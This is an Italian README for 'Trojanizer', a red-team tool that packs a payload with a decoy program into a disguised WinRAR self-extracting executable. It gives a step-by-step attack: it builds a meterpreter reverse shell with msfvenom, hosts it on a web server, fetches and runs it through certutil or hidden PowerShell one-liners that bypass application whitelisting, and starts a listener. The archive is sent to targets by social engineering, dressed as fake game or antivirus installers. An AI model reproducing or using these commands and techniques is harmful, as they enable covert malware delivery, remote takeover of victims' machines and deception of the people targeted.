
Trojanizza il tuo payload - automazione WinRAR (SFX) - sotto distribuzioni Linux
Versione rilasciata: v1.1 (Stabile)
Autore: pedro ubuntu [ r00t-3xp10it ]
Codename: Troia_Revisited
Distribuzioni supportate: Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam sviluppato @2017
Lo strumento Trojanizer utilizza WinRAR (SFX) per comprimere i due file inseriti dall'utente,
e li trasforma in un archivio eseguibile SFX (.exe). L'archivio SFX quando eseguito
eseguirà entrambi i file (il nostro payload e l'applicazione legittima contemporaneamente).
Per rendere l'archivio meno sospetto al target durante l'esecuzione, trojanizer
cercherà di sostituire l'icona predefinita (.ico) del file SFX con una selezionata dall'utente,
e sopprimerà tutti i messaggi della sandbox dell'archivio SFX (Silent=1 | Overwrite=1).
'Trojanizer non crea trojan, ma dal punto di vista del target, replica il comportamento di un trojan'
(esegue il payload in background, mentre l'applicazione legittima viene eseguita in primo piano).
Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installato-in-wine)
"Trojanizer.sh scaricherà/installerà tutte le dipendenze quando necessario"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
| Si consiglia di modificare e configurare l'opzione: SYSTEM_ARCH=[ your_sys_arch ] |
| nel file 'settings' prima di tentare di eseguire lo strumento per la prima volta. |
╚────────────────────────────────────────────────────────────────────────────────────────────╝
Trojanizer v1.1-Stable
.exe | .bat | .vbs | .ps1
"Tutti i payload che Windows/SFX può estrarre ed eseguire automaticamente"
SUGGERIMENTO: Se nel file settings è selezionato 'SINGLE_EXEC=ON',
allora trojanizer accetterà qualsiasi tipo di estensione in input.
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | ecc ..
"Tutte le applicazioni che Windows/SFX può estrarre ed eseguire automaticamente"
╔─────────────────────────────────────────────────────────────────────────────────────────╗
| Le 'opzioni avanzate' di Trojanizer sono accessibili solo nel file 'settings', |
| e possono essere configurate solo prima di eseguire lo strumento principale (Trojanizer.sh) |
╚─────────────────────────────────────────────────────────────────────────────────────────╝
-- Opzione avanzata Presetup
Trojanizer può essere configurato per eseguire un programma + comando prima dell'estrazione/esecuzione
dei due file compressi (archivio SFX). Ciò consente agli utenti di sfruttare il software preinstallato
per eseguire un comando remoto prima che avvenga l'estrazione effettiva nel sistema target.
Se attivo, trojanizer chiederà (sandbox zenity) il comando da eseguire
Trojanizer v1.1-Stable
-- single_file_execution
Esaminiamo il seguente scenario: hai un payload dll da inserire che devi eseguire dopo l'estrazione,
ma gli archivi SFX non possono eseguire direttamente file dll. Questa impostazione consente agli utenti
di inserire uno script batch (.bat) che verrà utilizzato per eseguire il payload dll.
Tutto ciò che Trojanizer deve fare è istruire l'archivio SFX a estrarre entrambi i file e
poi eseguire script.bat.
Trojanizer v1.1-Stable
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
| Il comportamento predefinito del commutatore single_file_execution è comprimere i due file |
| inseriti dall'utente ma eseguirne solo uno al momento dell'estrazione (il 2º file inserito |
| verrà eseguito) .. |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Molto lavoro eccezionale è stato fatto da molte persone, specialmente @subTee, riguardo al bypass delle liste |
| bianche delle applicazioni, che è ciò che vogliamo qui: eseguire codice arbitrario abusando dei binari integrati |
| di Microsoft. |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
L'esercizio seguente descrive come utilizzare i commutatori avanzati 'single_file_execution' e 'Presetup' di trojanizer per
scaricare (download remoto) ed eseguire qualsiasi payload utilizzando oneliner di bypass delle liste bianche delle applicazioni
'certutil' o 'powershell' ..
1º - utilizza metasploit per creare il nostro payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º - copia payload.exe nella webroot di apache2 e avvia il servizio
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - modifica il file 'settings' di Trojanizer e attiva:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - esecuzione dello strumento trojanizer
PAYLOAD DA COMPRIMERE => <path-to>/screenshot.png (non importa cosa comprimi)
ESEGUI QUESTO FILE DOPO L'ESTRAZIONE => <path-to>/AngryBirds.exe (da eseguire come esca)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
NOME FILE SFX => AngryBirds_installer (il nome dell'archivio sfx da creare)
SOSTITUISCI ICONA => Windows-Store.ico OPPURE Steam-logo.ico
5º - avvia un listener e invia l'archivio sfx al target utilizzando l'ingegneria sociale
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Quando l'archivio sfx viene eseguito, scaricherà payload.exe dal nostro webserver apache2 sul target e |
| lo eseguirà prima di estrarre 'screenshot.png' e 'AngryBirds.exe' (l'ultimo verrà eseguito come esca) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
Il seguente oneliner utilizza il metodo 'powershell(Downloadfile+start)' per ottenere lo stesso risultato del precedente esercizio con 'certutil' ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
Il seguente oneliner utilizza il metodo 'powershell(IEX+downloadstring)' per ottenere quasi lo stesso risultato (payload.ps1 non tocca il disco)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - Scarica il framework da github
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - Imposta i permessi di esecuzione dei file
cd trojanizer
sudo chmod +x *.sh
3º - configura il framework
nano settings
4º - Esegui lo strumento principale
sudo ./Trojanizer.sh
xsf.conf - esegue entrambi i file dopo l'estrazione (comportamento trojan)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (opzioni avanzate)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + bypass delle liste bianche delle applicazioni (certutil)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + bypass delle liste bianche delle applicazioni (powershell IEX)
Trojanizer v1.1-Stable
Archivio sfx finale con icona modificata
Trojanizer v1.1-Stable
All'interno dell'archivio sfx (aperto con winrar) - comportamento trojan
Trojanizer v1.1-Stable
All'interno dell'archivio sfx (aperto con winrar) - single_file_execution
Trojanizer v1.1-Stable
Trojanizer - finto installer di AVG anti-virus (comportamento trojan)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (non comportamento trojan)
https://www.youtube.com/watch?v=Ze0JkVtKbns
@subTee | @enigma0x3 | @H4d3s (SSA)
Riferimenti:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://github.com/r00t-3xp10it/trojanizer/issues